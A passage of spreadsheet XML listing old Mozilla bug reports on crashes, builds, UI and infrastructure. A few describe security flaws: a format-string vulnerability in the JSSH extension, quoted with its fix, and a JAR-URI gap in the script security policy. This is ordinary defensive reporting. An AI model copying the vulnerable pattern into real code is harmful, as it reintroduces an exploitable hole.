Removing these two functions reduces code size by about 400 bytes.</t>
  </si>
  <si>
    <t>SEAMONKEY-239404</t>
  </si>
  <si>
    <t>onerror popups should be blocked</t>
  </si>
  <si>
    <t>Onerror can be abused by intentionally triggering an error so onerror popups
should be disallowed.</t>
  </si>
  <si>
    <t>CORE-519465</t>
  </si>
  <si>
    <t>js-ctypes</t>
  </si>
  <si>
    <t>jsctypes broken on OSX 10.4/gcc-4.0.1/i686</t>
  </si>
  <si>
    <t>Created attachment 403497
fix
Found by honzab:
i686-apple-darwin8-gcc-4.0.1 (GCC) 4.0.1 (Apple Computer Inc. build 5370) Mac OS 10.4.11 XCode 2.5
/Users/starapica/Documents/mozilla/mozilla-1.9.2/out/js/ctypes/Function.cpp: In member function 'bool mozilla::ctypes::Function::Execute(JSContext* PRUint32 jsval* jsval*)':
/Users/starapica/Documents/mozilla/mozilla-1.9.2/out/js/ctypes/Function.cpp:566: error: invalid conversion from 'void (*)(...)' to 'void (*)()'
/Users/starapica/Documents/mozilla/mozilla-1.9.2/out/js/ctypes/Function.cpp:566: error:   initializing argument 2 of 'void ffi_call(ffi_cif* void (*)() void* void**)'</t>
  </si>
  <si>
    <t>SEAMONKEY-24531</t>
  </si>
  <si>
    <t>fix the uconv Data problem.</t>
  </si>
  <si>
    <t>my build hangs in the uconv Data folder.
sfraser has a good idea on how to fix it.</t>
  </si>
  <si>
    <t>THUNDERBIRD-236156</t>
  </si>
  <si>
    <t>Missing DTD errors unable to start thunderbird</t>
  </si>
  <si>
    <t>Caused by the checkin for Bug #235317
Thunderbird is currently DOA until we can get this fixed</t>
  </si>
  <si>
    <t>FIREFOX-320655</t>
  </si>
  <si>
    <t>History view changes should change sorting</t>
  </si>
  <si>
    <t>When you toggle between group by domain and group by visit the default sorting mode should change. Domain should be displayed alphabetically (it's weird to see this sorted by last visit date). Visits should be sorted by date by default.</t>
  </si>
  <si>
    <t>brettw</t>
  </si>
  <si>
    <t>CORE-204068</t>
  </si>
  <si>
    <t>Error pages don't work with capability.principal.* preferences set</t>
  </si>
  <si>
    <t>This is a little late spin off from bug 156997. That bug implemented better
looking error pages. Especially see comments 39-43 there. When some prefs
starting with capability.principal.codebase.* are set the error pages only
consist of the Try again-Link which doesnÂ´t even work.
Steps to reproduce:
1. Enable error pages (user_pref(browser.xul.error_pages.enabled true))
2. Add the following lines to your preferences:
user_pref(capability.principal.codebase.p0.granted UniversalXPConnect)
user_pref(capability.principal.codebase.p0.id http://bugzilla.mozilla.org)
3. Start Mozilla Navigator.
4. Type some random string in the URL bar and press return to display the error
page for DNS errors or do something else to provoke an error page.
5. See the page with only the Try again link in it.
When you try the same without the both capability.principal.codebase.* lines in
your Preferences you see the normal error pages.
I donÂ´t know what for those two lines are so I donÂ´t really understand whatÂ´s
going on here. Probably this bug is just a symptom of a more general issue.</t>
  </si>
  <si>
    <t>Stefan.Borggraefe</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-500058</t>
  </si>
  <si>
    <t>load monitoring on production-master</t>
  </si>
  <si>
    <t>Would it be possible to get munin / cacti monitoring on production-master?  I'm interested in tracking CPU usage system load memory/swap usage over time.</t>
  </si>
  <si>
    <t>CORE-351628</t>
  </si>
  <si>
    <t>[reflow branch] Crash [@ nsTableColFrame::ResetMinCoord]</t>
  </si>
  <si>
    <t>CORE-112701</t>
  </si>
  <si>
    <t>Active Accessibility: Separate accessible/src into multiple directories to enable the MOZ_XUL work to be completed</t>
  </si>
  <si>
    <t>This step needs to occur first because there is a bunch of changes that need to
be made in the code ( addition of #ifdef stuff ) to finally throw the switch.
So to ease the process I will seperate the directories first and then go back
and add all the MOZ_XUL define voodoo.
working with leaf on this he is going to do some cvs magic on his end and I
will supply new makefiles and mcp files</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-444813</t>
  </si>
  <si>
    <t>Feed Reader</t>
  </si>
  <si>
    <t>Drag and drop of RSS subscriptions on Windows causes Thunderbird to crash [@ nsDragService::nsDragService]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: version 2.0.0.14 (20080421)
When moving RSS feeds between folders using the mouse click-and-hold principle in the manage RSS subscriptions window Thunderbird ofter crashes. It does not occur always  usually crashes after 2 seconds of click-hold).
Reproducible: Always
Steps to Reproduce:
1. Have mutiple RSS subsriptions over multiple folders with one saved 'unread' search folder accross all RSS folders
2. Open RSS Subscriptions window
3. Move some RSS subscriptions between folders using mouse (click+hold -&gt; point to new folder &amp; release mouse click)
Actual Results:  
Thunderbird completely crashes &amp; Talkback is activated to report an crash occured.
Issue also occured in previous versions. It's very annoying &amp; embarrassing when trying to convert non-Thunderbird users to Thunderbird.</t>
  </si>
  <si>
    <t>wim.bos.be</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-314681</t>
  </si>
  <si>
    <t>Upgrade CC Attribution-ShareAlike to 2.5 and add RDF of license</t>
  </si>
  <si>
    <t xml:space="preserve">Index: mozilla-org/html/foundation/licensing/website-content.html
===================================================================
RCS file: /cvsroot/mozilla-org/html/foundation/licensing/website-content.htmlv
retrieving revision 1.4
diff -u -r1.4 website-content.html
--- mozilla-org/html/foundation/licensing/website-content.html	4 Sep 2005 19:28:37 -0000	1.4
+++ mozilla-org/html/foundation/licensing/website-content.html	1 Nov 2005 19:27:23 -0000
@@ -1313 +1313 @@
 The text of documents in this collection is available under the Creative
 Commons Attribution Share-alike license.
-&lt;img
+&lt;img
 alt=Creative Commons License 
 src=http://creativecommons.org/images/public/somerights20.gif /&gt;
-A summary of the
+A summary of the
 terms of this license is available as well as its &lt;a
-href=http://creativecommons.org/licenses/by-sa/2.0/legalcode&gt;detailed
+href=http://creativecommons.org/licenses/by-sa/2.5/legalcode&gt;detailed
 terms.
 The rights in the trademarks logos service marks of the Mozilla
@@ -365 +3621 @@
 Licensing
 Policies page.
+&lt;!--
+
+&lt;rdf:RDF xmlns=http://web.resource.org/cc/
+    xmlns:rdf=http://www.w3.org/1999/02/22-rdf-syntax-ns#&gt;
+
+   
+   
+   
+   
+   
+   
+
+
+
+--&gt;
+
 </t>
  </si>
  <si>
    <t>lohmatii</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-253340</t>
  </si>
  <si>
    <t>Please add the Lorem Ipsum Content Generator extension to the extension list</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Please add this extension to the list:
Email: moz_jg@yahoo.com
Name: LoremIpsum Content Generator
Version: 0.4
XPI: http://jgillick.nettripper.com/loremipsum/loremipsum.xpi
Size: 10KB
Homepage: http://jgillick.nettripper.com/#loremipsum
Mozilla: 1.6 - 1.7+
Firefox: 0.6 - 0.9+
Description:
Uses latin words to create filler content.
Thanks
Jeremy
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>moz_jg</t>
  </si>
  <si>
    <t>CORE-230578</t>
  </si>
  <si>
    <t>some horizontal lines of bitmap fail to load</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20031007 Firebird/0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20031007 Firebird/0.7
this is a random bitmap generator from random.org.
when loaded about 15% of the horizontal lines are white.
but this is corrected if i minimize and recall the window.
this problem does not happen with smaller images.
Reproducible: Always
Steps to Reproduce:
1. load  http://www.random.org/cgi-bin/randxbm?width=512&amp;height=512
2.
3.
Actual Results:  
some horizontal lines are white.
Expected Results:  
all lines should have displayed random black or white pixels.</t>
  </si>
  <si>
    <t>chrisdlugosz</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-665456</t>
  </si>
  <si>
    <t>[hy-AM] Translate update billboard encouraging users on older Firefox 4 beta builds to update to Aurora</t>
  </si>
  <si>
    <t>Wwe are going to propose users on the 4.0.1beta channel to switch to Aurora.
A wide billboard in a window box will be displayed for them proposing the switch here is the page:
http://www-trunk.stage.mozilla.com/hy-AM/firefox/aurora/details/
We need a few strings for this page to be translated here is the file:
http://viewvc.svn.mozilla.org/vc/projects/mozilla.com/trunk/hy-AM/firefox/aurora/details/index.html?content-type=text%2Fplain&amp;view=co
Please commit directly to svn or alternatively attach your file to this bug and Milos or myself will push it to the repository.
Thanks</t>
  </si>
  <si>
    <t>robyerevan</t>
  </si>
  <si>
    <t>CORE-366611</t>
  </si>
  <si>
    <t>Remove extensions/p3p from the tree.</t>
  </si>
  <si>
    <t>The p3p code is currently used by seamonkey and has not been owned or touched since 2003.  We really shouldn't keep unowned code around for this long.</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-870733</t>
  </si>
  <si>
    <t>Gaia::System</t>
  </si>
  <si>
    <t>Bug 867912 broke the linter tests</t>
  </si>
  <si>
    <t>----- FILE  :  /Users/rik24d/code/gaia/apps/system/js/sound_manager.js -----
Line 423 E:0240: @param descriptions must end with valid punctuation such as a period.</t>
  </si>
  <si>
    <t>anthony</t>
  </si>
  <si>
    <t>CORE-272705</t>
  </si>
  <si>
    <t>Error ``document.getElementById(cmd_SwitchTextDirection) has no properties'' [xs] in file ``chrome://communicator/content/utilityOverlay.js'' line 387 character 0.</t>
  </si>
  <si>
    <t>Error ``document.getElementById(cmd_SwitchTextDirection) has no properties''
[xs] in file ``chrome://communicator/content/utilityOverlay.js'' line 387
character 0.
Stopped for error handler.
#0: function goUpdateGlobalEditMenuItems() in
 line 387
385: try {
386: // XXX: implement controller for cmd_SwitchTextDirection
387: document.getElementById('cmd_SwitchTextDirection').setAttribute('disabled'
388: !document.commandDispatcher.focusedElement)
389: }
This happens in various windows including venkman it's amazingly annoying.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-201607</t>
  </si>
  <si>
    <t>atdmt.com ad service crashes (Wired.com anandtech.com) [@ nsBaseWidget::GetRenderingContext]</t>
  </si>
  <si>
    <t>Seemingly random crash wasn't doing anything particular. This time (Camino
2003041005) I was on wired.com and may have had another window or two open with
bugzilla reports. Talkback ID TB231515Y
Looking back over Camino.crash.log I've also seen the crash in an earlier build
on 2003-04-06 14:55:49 -0400 Date/Time:  2003-04-06 14:54:02 -0400 but i don't
have talkback IDs on hand
I'll attach a full crash log in a minute.
**********
Date/Time:  2003-04-11 01:47:01 -0400
OS Version: 10.2.5 (Build 6L29)
Host:       pnhTiObject.local.
Command:    Camino
PID:        553
Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x00000000
Thread 0 Crashed:
 #0   0x003e10ac in nsBaseWidget::GetRenderingContext()
 #1   0x003db06c in -[ChildView drawRect:]
 #2   0x930809ec in -[NSView _drawRect:clip:]
 #3   0x93096a34 in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:]
 #4   0x93096bbc in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:]
 #5   0x93096bbc in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:]
 #6   0x93096bbc in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:]
 #7   0x93096bbc in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:]
 #8   0x93096bbc in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:]
 #9   0x93096bbc in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:]
 #10  0x93096bbc in -[NSView _recursiveDisplayAllDirtyWithLockFocus:visRect:]
 #11  0x930761e8 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #12  0x930765d0 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #13  0x930765d0 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #14  0x930765d0 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #15  0x930765d0 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #16  0x930765d0 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #17  0x930765d0 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #18  0x930765d0 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #19  0x930765d0 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #20  0x930765d0 in -[NSView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #21  0x930c8224 in -[NSFrameView
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #22  0x930b2c14 in -[NSThemeFrame
_recursiveDisplayRectIfNeededIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:topView:]
 #23  0x930963f4 in -[NSView
_displayRectIgnoringOpacity:isVisibleRect:rectIsVisibleRectForView:]
 #24  0x930a5778 in -[NSView displayIfNeeded]
 #25  0x930b5608 in -[NSWindow displayIfNeeded]
 #26  0x930a03b0 in _handleWindowNeedsDisplay
 #27  0x90148464 in __CFRunLoopDoObservers
 #28  0x901487d4 in __CFRunLoopRun
 #29  0x90180f58 in CFRunLoopRunSpecific
 #30  0x969a3b70 in RunCurrentEventLoopInMode
 #31  0x969b3a78 in ReceiveNextEventCommon
 #32  0x969dabbc in BlockUntilNextEventMatchingListInMode
 #33  0x9308dedc in _DPSNextEvent
 #34  0x930a0158 in -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:]
 #35  0x930b1d88 in -[NSApplication run]
 #36  0x9315fc58 in NSApplicationMain
 #37  0x00004534 in _start
 #38  0x000043b4 in start</t>
  </si>
  <si>
    <t>CORE-162063</t>
  </si>
  <si>
    <t>[FIX]Table-related pseudo-frames do not get removed when DOM/style is changed</t>
  </si>
  <si>
    <t>This is a bug to track the various issues caused by the following problem:
During frame construction we create pseudo frames when non-table-related
frames are inside a table but not inside a table cell.  Similarly we create
pseudo frames when a cell is not inside a table.
The problem is that if a dynamic modification of some sort happens (changing the
display of the frame that forced the creation of the pseudo frames removing
it from the DOM etc) the pseudo frames do not get destroyed.  They stay in
the frame tree.
Bug 156888 and bug 97506 (last testcase the one in bug 97506 comment 14) have
testcases that demonstrate the problem.
It seems to me that we want to somehow mark a frame that forced pseudo-frames to
be created and have a way of getting from that frame to the outermost
pseudo-frame it forced.  Then ContentRemoved (which both DOM removal and frame
reconstruction go through) should tear down not just the primary frame but also
all the pseudos it forced into being.
I tried hacking this together but have found that getting at the
newly-constructed frame and the outermost pseudo at the same time is not so
easy... )</t>
  </si>
  <si>
    <t>CORE-396007</t>
  </si>
  <si>
    <t>Using posix_memalign for GC arenas when mmap is not available</t>
  </si>
  <si>
    <t>Bug 392263 uses mmap/VirtualAlloc to implement the allocation of aligned GC arenas using non-executable CPU pages. When the paged allocation is not available or can not be used due to an unsuitable size of the CPU page the code switches to over sized malloc calls to implement aligned allocation.
It would be nice to use posix_memalign instead when available and avoid malloc overhead.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-205729</t>
  </si>
  <si>
    <t>Need to pass a valid msg window to PerformBiff() at startup.</t>
  </si>
  <si>
    <t>This is bugsape 23604.
Securid dialog is not prompted due to a missing msg window.</t>
  </si>
  <si>
    <t>cavin</t>
  </si>
  <si>
    <t>FIREFOX-346764</t>
  </si>
  <si>
    <t>Change Software Installation to Add-ons Installation</t>
  </si>
  <si>
    <t>browser/preferences/preferences.properties:
* installpermissionstitle = Allowed Sites - Software Installation
Other places firefox talks about installing Addons not Software.  It's confusing.</t>
  </si>
  <si>
    <t>mbeltzner</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-243660</t>
  </si>
  <si>
    <t>Need PHP installed on rodan.mozilla.org</t>
  </si>
  <si>
    <t>Since rodan is the test server for Mozilla Update... It needs a recent version
of PHP installed for Apache.
I'm using PHP 4.3.5 locally to develop Mozilla Update.
The only non-default PHP extension it relies on is the Zip File Functions
(Read-Only) to be able to read XPIs.. 
(http://www.php.net/manual/en/ref.zip.php)</t>
  </si>
  <si>
    <t>leaf</t>
  </si>
  <si>
    <t>bugtrap</t>
  </si>
  <si>
    <t>CORE-328421</t>
  </si>
  <si>
    <t>Text for links disappears and only underlines are visible</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20060223 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20060223 Firefox/1.6a1
On https://mustang.dev.java.net/ lot of links dont show the text. Only an underline appears instead
Reproducible: Always
Steps to Reproduce:
1.Browse to https://mustang.dev.java.net/
2. Look at Download Mustang. Below this one should see a bulleted list of Links like Latest Binary Mustang SnapshotsLatest Mustang Source Snapshots etc
3. Only bullets and underlines are displayed no text
4. Similar problems can be seen under Links and Feedback section
Actual Results:  
No text displayed for certain links
Expected Results:  
Links as well as text should get displayed. This used to work before switch to Cairo</t>
  </si>
  <si>
    <t>jayramj</t>
  </si>
  <si>
    <t>FIREFOX-254225</t>
  </si>
  <si>
    <t>Menus</t>
  </si>
  <si>
    <t>Display keyboard shortcuts for back and forward in Go menu</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040628 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040628 Firefox/0.9.1
There are two undocumented features in the Mac OS X version of Firefox.  The
command+left arrow shortcut for back function is not listed next to Back in the
Go menu like it is in the Windows version of Firefox.  The same goes for the
Forward function and the command+right arrow that should be listed next to it. 
I have tried both shortcuts and they work perfectly despite being undocumented.
 If nothing else this change should be made so that Firefox does not have any
visible differences between the Windows and Mac OS X version of Firefox.  
Reproducible: Always
Steps to Reproduce:
1.Open Firefox
2.Click the Go menu 
Actual Results:  
You'll immediately see the keyboard shortcuts aren't listed next to the Back and
Forward functions.
Expected Results:  
The keyboard shortcuts should've been listed next to the Back and Forward
functions like they're in the Windows version of Firefox.</t>
  </si>
  <si>
    <t>asaf</t>
  </si>
  <si>
    <t>craigwd_2000</t>
  </si>
  <si>
    <t>CORE-956655</t>
  </si>
  <si>
    <t>DOM: Device Interfaces</t>
  </si>
  <si>
    <t>WebMobileConnection: move mobileConnection DOM classes out of namesapce mozilla::dom::network to mozilla::dom</t>
  </si>
  <si>
    <t>It seems we don't need to put MobileConnection into an extra namespacing 'mozilla::dom::network' maybe we can just stick these in 'mozilla::dom'.
And in this bug I would like to move mobileConnection related *.idl/*.js/*.c/*.h into '$GECKO_ROOT/dom/mobileconnection' given that there are many files will be created for the IPDL implementation in bug 843452 having a extra folder for mobileConnection makes the file hierarchies more clear. (Please see bug 843452 comment #6)</t>
  </si>
  <si>
    <t>echen</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-502966</t>
  </si>
  <si>
    <t>Do a special rewrite to support getpersonas.com/harry_potter</t>
  </si>
  <si>
    <t>RewriteRule ^/harry_potter /gallery/designer/harry_potter [PTL]
Will need to add this to the personas apache config</t>
  </si>
  <si>
    <t>zandr</t>
  </si>
  <si>
    <t>telliott</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-479398</t>
  </si>
  <si>
    <t>Statistics</t>
  </si>
  <si>
    <t>Group by: Week should display averages rather than total count</t>
  </si>
  <si>
    <t>Right now if I select Group by: Week in the statistics dashboard all the data points for that week are simply added up - SUM(pings). I suggest changing that into AVG(pings) a.k.a. SUM(pings)/COUNT(*). This will make it easier to compare daily numbers with the weekly or monthly averages. It will also make the numbers independent of the number of data points (the switch to daily sampling is extremely visible in the stats right now). Note that the averages can be rounded if the statistics dashboard expects integers I don't see any reason why rounding would be a problem.</t>
  </si>
  <si>
    <t>thepotch</t>
  </si>
  <si>
    <t>gaubugzilla</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-145516</t>
  </si>
  <si>
    <t>German</t>
  </si>
  <si>
    <t>dzbank.de - unable to visit</t>
  </si>
  <si>
    <t>i see lots of funny script-coding in the left frame.
mozilla build 20020510</t>
  </si>
  <si>
    <t>german</t>
  </si>
  <si>
    <t>renke</t>
  </si>
  <si>
    <t>NSS-338021</t>
  </si>
  <si>
    <t>Dead code in sec_pkcs12_install_bags (security/nss/lib/pkcs12/p12d.c)</t>
  </si>
  <si>
    <t>Please see the sample URL. The test at line 2860 will never succeed because the block at line 2849 returns if |rv| is nonzero.</t>
  </si>
  <si>
    <t>kherron+mozilla</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-959788</t>
  </si>
  <si>
    <t>decommission releng ganglia servers in scl3</t>
  </si>
  <si>
    <t>The following hosts are still reporting to ganglia1.private.releng.scl3.mozilla.com and need to have gmond/ganglia removed:
admin1a.private.releng.scl3.mozilla.com
admin1b.private.releng.scl3.mozilla.com
ns1.private.releng.scl3.mozilla.com
ns2.private.releng.scl3.mozilla.com
nagios1.private.releng.scl3.mozilla.com
The following hosts are still reporting to ganglia1.srv.releng.scl3.mozilla.com and need to have gmond/ganglia removed:
cruncher.srv.releng.scl3.mozilla.com
dev-stage01.srv.releng.scl3.mozilla.com
ganglia1.srv.releng.scl3.mozilla.com (will go away once we shut down the vm)</t>
  </si>
  <si>
    <t>CORE-377747</t>
  </si>
  <si>
    <t>Format string issue in JSSH extension</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 6.0 SLCC1 .NET CLR 2.0.50727 Media Center PC 5.0 .NET CLR 3.0.04506 .NET CLR 1.1.4322 InfoPath.2)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9a3pre) Gecko/20070322 Minefield/3.0a3pre
Not sure were this would get logged looked around for a better place to log it.
A classic format string bug exists in the nsJSSH.cpp in the Print function when network input is printed via printf.
       printf(JS_GetStringBytes(str)) // use cout if no output stream given.
See URL for code line link.
The fix is easy:
       printf(%s JS_GetStringBytes(str)) // use cout if no output stream given.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>msg</t>
  </si>
  <si>
    <t>CORE-441479</t>
  </si>
  <si>
    <t>for-in loops should use one backward branch (with downward goto on entry)</t>
  </si>
  <si>
    <t>See bug 371802 which fixed while and do-while loops to use one backward branch and bug 441477 which will be fixed shortly so for() loops avoid branch at top and goto backward at bottom.
/be</t>
  </si>
  <si>
    <t>BUGZILLA-348852</t>
  </si>
  <si>
    <t>bugzilla.org</t>
  </si>
  <si>
    <t>http://www.bugzilla.org/docs/2.22/html/ loading incorrectly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Not sure if this is the place to post this... but the page http://www.bugzilla.org/docs/2.22/html/ is not loading correctly... it stops right after heading #2... this has been for a few days now and happens in both IE and Firefox... 
Reproducible: Always</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-303412</t>
  </si>
  <si>
    <t>RSS Discovery and Preview</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD</t>
  </si>
  <si>
    <t>feedview: Article length box overlaps feed items</t>
  </si>
  <si>
    <t>Either the box should float instead of abs pos or the content should have a
right-margin to avoid the box.</t>
  </si>
  <si>
    <t>tuukka.tolvanen</t>
  </si>
  <si>
    <t>SEAMONKEY-146411</t>
  </si>
  <si>
    <t>MailNews: Address Book &amp; Contacts</t>
  </si>
  <si>
    <t>3rd party LDAP Query may result in an invalid filter.</t>
  </si>
  <si>
    <t>The Mozilla Address Book does not allow a blank search condition when attempting
to execute a query against an LDAP Directory Server. This is disallowed in the
StartSearch() method. But 3rd party products like OpenOffice.org integrate with
Mozilla using the DoQuery() method. Attempts to run a query using the
DoQuery()against a Mozilla LDAP  Directory requesting all the Mozilla attributes
will result in an invalid filter i.e. (|) getting generated. 
Investigating this behaviour further it is not sufficient to simply generate a
blank filter as this will default to the filter (objectclass=*) thereby
returning all entries from the LDAP Server regardless. Thus I have suggested
that we default the filter in this case to (mail=*) to return entries which are
relevant to the Address Book.</t>
  </si>
  <si>
    <t>john.marmion</t>
  </si>
  <si>
    <t>THUNDERBIRD-379396</t>
  </si>
  <si>
    <t>Enable Breakpad Support In Thunderbird</t>
  </si>
  <si>
    <t>We'll be moving our crash reporting tools from talkback to breakpad in the 1.9 time frame. 
Here are some thoughts I have about adding this feature to Thunderbird. It looks like almost all of the airbag client code is in mozilla\toolkit so we may not have to do much!
* Bug 368206 --&gt; this patch contains app specific build foo for break pad on the mac that we'll want to port to thunderbird.
* Packaging changes to packages-static to package the break pad client
* Make sure MOZ_AIRBAG is defined for thunderbird.
* Make sure we're building toolkit\airbag for Thunderbird
* I suspect there are some tinderbox configuration changes we'll have to make for the Thunderbird build machines as well so we do the right thing with symbols.
I have a feeling Ted might be able to link us to more bugs for adding breakpad support to Firefox that we'll want to look into porting to Thunderbird. cc'ing Ted :).</t>
  </si>
  <si>
    <t>CORE-460751</t>
  </si>
  <si>
    <t>Progress events should use long long not long for .total and .loaded</t>
  </si>
  <si>
    <t>This was finally changed today
http://dev.w3.org/2006/webapi/progress/Progress.html
Haven't yet checked what kinds of changes  or  need.
XMLHttpRequest should be easy to fix.</t>
  </si>
  <si>
    <t>BUGZILLA-984980</t>
  </si>
  <si>
    <t>Keyboard shortcut to switch between preview mode and edit mode</t>
  </si>
  <si>
    <t>Github uses Cmd-Shift-P on Mac to do that and it's pretty neat.</t>
  </si>
  <si>
    <t>CORE-184363</t>
  </si>
  <si>
    <t>Crash with tooltip [@ nsXULTooltipListener::KillTooltipTimer] [@ nsXULTooltipListener::DestroyTooltip] [@ nsXULTooltipListener::HideTooltip]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.3a) Gecko/20021208
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.3a) Gecko/20021208
I had the mouse cursor lingering over a link (not sure if it had a tooltip on
the link itself) when the browser simply crashed.  Every attempt at reproducing
failed.  Mozilla trunk 2002120803 Mac OS X 10.2.2.
Reproducible: Couldn't Reproduce
Steps to Reproduce:
1. Unknown
Actual Results:  
Browser crashed
Expected Results:  
Browser no crash</t>
  </si>
  <si>
    <t>withay</t>
  </si>
  <si>
    <t>CORE-406251</t>
  </si>
  <si>
    <t>int value conversion problem in NPRuntime doesn't work with large ints (high bits set)</t>
  </si>
  <si>
    <t>As Kenneth Russell pointed out in person to me the NPRuntime API layer doesn't properly deal when passing large integer values from a plugin to JS. We fail to see that an integer value doesn't fit in an integer jsval... Patch coming up.</t>
  </si>
  <si>
    <t>CORE-298823</t>
  </si>
  <si>
    <t>JAR URIs (and other types missing the host part) are not properly handled by nsScriptSecurityManager::LookupPolicy()</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 it-IT rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 it-IT rv:1.7.8) Gecko/20050511 Firefox/1.0.4
While nsScriptSecurityManager::SecurityCompareURIs() addresses specifically JAR
URIs by comparing their base URIs (
http://lxr.mozilla.org/seamonkey/source/caps/src/nsScriptSecurityManager.cpp#247
) weird things happen when LookupPolicy() tries to check a JAR URI against
domain policies.
Since nsPrincipal::GetOrigin() -
http://lxr.mozilla.org/seamonkey/source/caps/src/nsPrincipal.cpp#185 - returns
the whole URI instead of the domain only mOriginToPolicyMap can't be looked up
by domain because the naive domain parsing based to lastDot and
nextToLastDot is fooled by dots that *always* follow the domain in a JAR URI:
at the very least the file extension separator at the end of the jarFile part
(i.e. .jar).
OTOH InitPolicy() populates mOriginToPolicyMap by the same
lastDot/nextToLastDot hack so it cannot use a partial JAR URI specification as
a key that can be matched later by LookupPolicies().
Result is that the only capabilities.policies.myCustomPolicy.sites URI that
matches a JAR URI is jar: which matches *every* JAR URI. 
This is obviously too permissive for whitelists and too restrictive for
blacklists considerably reducing CAPS usefulness.
The same problem affects other URI types missing host part but the JAR case is
IMHO the most severe: deciding a permission that applies to all file:// URIs is
a matter of trusting your whole filesystem which is wide but more acceptable
than putting together jar:chrome:// and jar://http://www.evilhackerz.ru -)
I believe there are two possible mutually exclusive fixes both involving
treating JAR  URIs as a special case (as SecurityCompareURIs already does):
1. In LookupPolicy() check if principal origin is a jar: URI and if it is use
the part after the first colon for matching
2. In InitPolicy() check if domain spec that is going to be added contains /
after its scheme: if this is the case use its scheme rather than domainStart as
mOriginToPolicyMap key and use whole URL spec to construct the DomainEntry (
see
http://lxr.mozilla.org/seamonkey/source/caps/src/nsScriptSecurityManager.cpp#3052 ).
Solution #1 would be probably more consistent with user expectation that
www.somedomain.com should match
jar:http://www.somedomain.com/somejar.jar!/somefile.html as well.
